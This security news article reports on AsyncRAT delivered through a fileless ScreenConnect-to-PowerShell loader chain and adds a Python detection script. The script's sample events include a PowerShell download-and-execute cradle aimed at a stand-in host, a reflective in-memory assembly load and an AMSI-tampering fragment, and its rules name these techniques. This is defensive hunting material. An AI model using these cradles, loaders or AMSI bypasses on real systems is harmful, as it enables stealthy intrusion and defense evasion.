Security researchers have discovered an open-source remote access trojan, AsyncRAT, being delivered through a multi-stage, in-memory loader as adversaries move to fileless techniques.
According to LevelBlue Labs’ findings, attackers gained an initial foothold through a compromised ScreenConnect client and ran PowerShell to fetch two staged payloads.
“This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory,” Sean Shirley, a network security engineer at LevelBlue, explained in a blog post. “The approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate.”
The analysis revealed a minimalist fileless attack, utilizing trusted admin tooling, tiny bootstrap scripts, and .NET loaders, designed to evade signature-based detection while delivering full remote control capability.
Legitimate tools abused for fileless staging
LevelBlue’s timeline ties the initial compromise to a ConnectWise ScreenConnect deployment used as a relay/C2 endpoint.
“The threat actor initiated an interactive session through relay.shipperzone[.]online, a known malicious domain linked to unauthorized ScreenConnect deployments,” Shirley noted. “From this session, a VBScript (Update.vbs) was executed using WScript, triggering a PowerShell command designed to fetch two external payloads.”
Rather than dropping heavy binaries, the operators used small, seemingly harmless code (a VBScript that launches PowerShell commands) to fetch and assemble two staged .NET payloads in memory. The first-stage assembly acts as an obfuscator/loader, converting the downloaded content into byte arrays and using reflection to invoke the secondary assembly’s Main() directly.
This keeps the filesystem clean and leaves antivirus scanners looking for the wrong signals.
RAT with evasion and persistence
Once AsyncRAT was loaded, the attackers took steps to disrupt Windows defenses. The report notes techniques such as disabling the Anti-malware Scan Interface (AMSI) and tampering with Event Tracing for Windows (ETW), both critical to runtime detection. To maintain persistence, they created a scheduled task disguised as “Skype Update,” ensuring the RAT would restart after reboots.
LevelBlue’s analysis also uncovered AsyncRAT’s encrypted configuration file, secured with AES-256, which contained instructions to connect back to a DuckDNS-based command and control (C2) server. The C2 communication used custom packet formats over TCP, a method typically used for flexibility and evasion.
AsyncRAT grants operators access to powerful features: keystroke logging, browser credential theft, clipboard monitoring, and system surveillance. LevelBlue published a list of indicators of compromise (IoCs) for defenders to add to their scanners. Additional general best practices include blocking malicious domains, hunting for PowerShell one-liners and in-memory .NET reflective loads, and monitoring for AMSI/ETW tampering and for suspicious scheduled task creation.
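The hunting guidance above, together with the WScript-to-PowerShell chain and the “Skype Update” persistence task described earlier, as a worked triage example. This is added illustrative code, not LevelBlue’s tooling or anything from the report; the event records are constructed to mimic Windows event 4104 (PowerShell script block text), event 4698 (scheduled task created) and Sysmon event 1 (process creation), and the domain, task name and the ScreenConnect client process name in the samples are assumptions.

```python
import re
from typing import Dict, List

# Rules for PowerShell script-block text (event 4104). Each pattern targets one
# behaviour from the report: download cradles, in-memory .NET reflective
# loading, AMSI tampering and ETW tampering.
SCRIPT_BLOCK_RULES: Dict[str, "re.Pattern[str]"] = {
    "download_cradle": re.compile(
        r"(Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b)", re.I),
    "reflective_load": re.compile(
        r"(\[(System\.)?Reflection\.Assembly\]::Load\b|GetMethod\(['\"]Main['\"]\)|EntryPoint\.Invoke)", re.I),
    "amsi_tamper": re.compile(r"(AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsi\.dll)", re.I),
    "etw_tamper": re.compile(r"(EtwEventWrite|Eventing\.EventProvider|PSEtwLogProvider)", re.I),
}

# Script interpreters that a persistence task or a remote-support client
# should rarely launch directly.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Flags that hide the window or carry an encoded/unrestricted command.
HIDDEN_FLAGS = re.compile(r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-ep\s+bypass)", re.I)

# Constructed sample events (not from the LevelBlue report). Paths, the
# task name and the ScreenConnect client process name are assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 4104,
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s1')"},
    {"id": 2, "event_id": 4104,
     "text": "$b=[Convert]::FromBase64String($x);[System.Reflection.Assembly]::Load($b)"
             ".GetType('L').GetMethod('Main').Invoke($null,$null)"},
    {"id": 3, "event_id": 4104, "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"},
    {"id": 4, "event_id": 4104, "text": "$p=[System.Diagnostics.Eventing.EventProvider] # EtwEventWrite fragment"},
    {"id": 5, "event_id": 4104, "text": "Get-ChildItem C:\\Users | Sort-Object Length"},  # benign
    {"id": 6, "event_id": 4698, "task_name": r"\Skype Update",
     "command": "powershell.exe", "arguments": "-w hidden -nop -ep bypass -c <placeholder>"},
    {"id": 7, "event_id": 4698, "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "command": r"%windir%\system32\defrag.exe", "arguments": "-c -h -o -$"},  # benign
    {"id": 8, "event_id": 1, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 9, "event_id": 1, "parent_image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.WindowsClient.exe",
     "image": r"C:\Windows\System32\wscript.exe"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_script_block(text: str) -> List[str]:
    """Names of all script-block rules matching one logged script text."""
    return [name for name, rx in SCRIPT_BLOCK_RULES.items() if rx.search(text)]


def check_scheduled_task(command: str, arguments: str) -> List[str]:
    """Flag a new task whose action is a script host or uses hidden/encoded flags."""
    hits = []
    if _basename(command) in SCRIPT_HOSTS:
        hits.append("task_runs_script_host")
    if HIDDEN_FLAGS.search(arguments):
        hits.append("task_hidden_or_encoded")
    return hits


def check_process_create(parent_image: str, image: str) -> List[str]:
    """Flag script hosts spawning PowerShell and a remote-support client spawning an interpreter."""
    parent, child = _basename(parent_image), _basename(image)
    hits = []
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    if "screenconnect" in parent and child in SCRIPT_HOSTS | {"cmd.exe"}:
        hits.append("remote_tool_spawns_interpreter")
    return hits


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map event id -> matched rule names; events with no hits are omitted."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        if ev["event_id"] == 4104:
            hits = check_script_block(ev["text"])
        elif ev["event_id"] == 4698:
            hits = check_scheduled_task(ev["command"], ev["arguments"])
        elif ev["event_id"] == 1:
            hits = check_process_create(ev["parent_image"], ev["image"])
        else:
            hits = []
        if hits:
            findings[ev["id"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Each rule is deliberately narrow so that a hit names the behaviour an analyst should pivot on; in practice the script-block rules are noisy on administrative PowerShell, so the process-lineage and scheduled-task rules are the ones to alert on first and the 4104 matches are best used to enrich those alerts.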
Threat actors are increasingly leaning toward fileless intrusions, drawn by their quiet execution and reliable results. Earlier this year, attackers were caught using a similar technique, delivering a malicious VBScript via phishing that ultimately loaded the popular Remcos RAT in memory on victim machines.